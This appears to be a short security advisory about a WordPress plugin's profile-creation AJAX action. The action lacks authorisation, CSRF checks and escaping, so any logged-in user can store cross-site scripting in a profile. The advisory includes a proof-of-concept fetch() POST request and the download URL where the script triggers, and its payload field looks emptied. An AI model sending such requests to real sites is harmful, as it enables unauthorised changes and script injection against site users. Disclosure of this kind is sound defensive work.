The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them
Create profile: fetch(“https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“name”:“y”, “slug”: “y”, “data”: btoa(“”)}), “method”: “POST”, “credentials”: “include” }); The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name;=y